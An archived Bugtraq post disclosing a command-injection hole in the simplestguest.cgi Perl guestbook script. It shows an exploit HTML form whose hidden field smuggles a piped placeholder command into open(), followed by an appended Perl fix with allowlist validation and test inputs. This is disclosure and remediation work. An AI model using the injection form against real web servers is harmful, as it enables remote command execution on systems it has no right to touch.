Bugtraq mailing list archives

Re: Insecure input validation in simplestmail.cgi


From: suid () SNEAKERZ ORG
Date: Mon, 13 Dec 0100 01:14:04 +0000

simplestmail.cgi is another Perl CGI written by "Tammie's HUSBAND" Leif
Wright.

The whole group of "simplest" CGIs are bad. Web developers: don't use them.

I didn't really post this because it's pretty lame, but I looked at a few of these
a while back and here's something I put on my site in February (which used to
be suid.edu and is now www.sneakerz.org/~suid/).

suid () sneakerz org - mini advisory - Tammies Husband Guestbook CGI

Software:       simplestguest.cgi       
URL:            http://www.conservatives.net/atheist/scripts/simplestguest.html
Version:        Version 2
Platforms:      Unix
Type:           Input validation problem

Summary:

        Anyone can execute any command on the remote system with
        the privileges of the web server.

Vulnerability:

        The Perl code does no input validation and performs an
        open() on a user-supplied input.

Exploit:

        Build an HTML form resembling:

        <form action=/cgi-bin/simplestguest.cgi method=POST>
                <input type=hidden name=required value="NAME">
                <input type=hidden name=guestbook
                value=" | <command goes here> |">
                <input type=hidden name="NAME" value="X">
                <input type=submit>
        </form>

        Of course you could simply send this in a POST request directly
        to the web server. Whatever.


http://www.sneakerz.org/~suid/

EOF
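
One way to close the hole described in the advisory above, shown as an added example that is not part of the original post and not code from the script or its author: the guestbook name is checked against an allowlist and opened with three-argument open(), so a value such as " | <command goes here> |" is never interpreted as a pipe. The directory path, the ".html" naming rule and the function names are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Fcntl qw(:flock);

# Assumed layout: all guestbook files live in one directory (hypothetical path).
my $GUESTBOOK_DIR = '/var/www/guestbooks';

# Accept only a bare file name: letters, digits, '_' and '-', ending in ".html".
# Spaces, '|', '<', '>', '/', ".." and NUL bytes all fail the match.
# \A and \z anchor the whole string, so a trailing newline is refused too.
sub safe_guestbook_path {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A([A-Za-z0-9_-]{1,64}\.html)\z/;
    return "$GUESTBOOK_DIR/$1";    # $1 is the validated (untainted) capture
}

# Append one entry. With three-argument open() the mode is its own argument,
# so the file name is never parsed for '|', '<' or '>' as it is in the
# two-argument form open(FH, $user_input).
# HTML-escaping of $entry is a separate concern and is not handled here.
sub append_entry {
    my ($name, $entry) = @_;
    my $path = safe_guestbook_path($name)
        or return 0;
    open(my $fh, '>>', $path) or return 0;
    flock($fh, LOCK_EX) or do { close($fh); return 0 };
    print {$fh} $entry, "\n";
    close($fh) or return 0;
    return 1;
}

# Constructed sample values for the "guestbook" form field.
my @samples = (
    'guestbook.html',
    ' | <command goes here> |',    # the shape of value shown in the advisory
    '../../etc/passwd',
    "a.html\0extra",
);
for my $candidate (@samples) {
    my $verdict = defined(safe_guestbook_path($candidate)) ? 'accepted' : 'rejected';
    (my $shown = $candidate) =~ s/[^\x20-\x7e]/?/g;    # make NUL printable
    printf "%-28s %s\n", "[$shown]", $verdict;
}
```

Running the script under perl -T additionally makes Perl refuse to pass any unvalidated request data to open().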

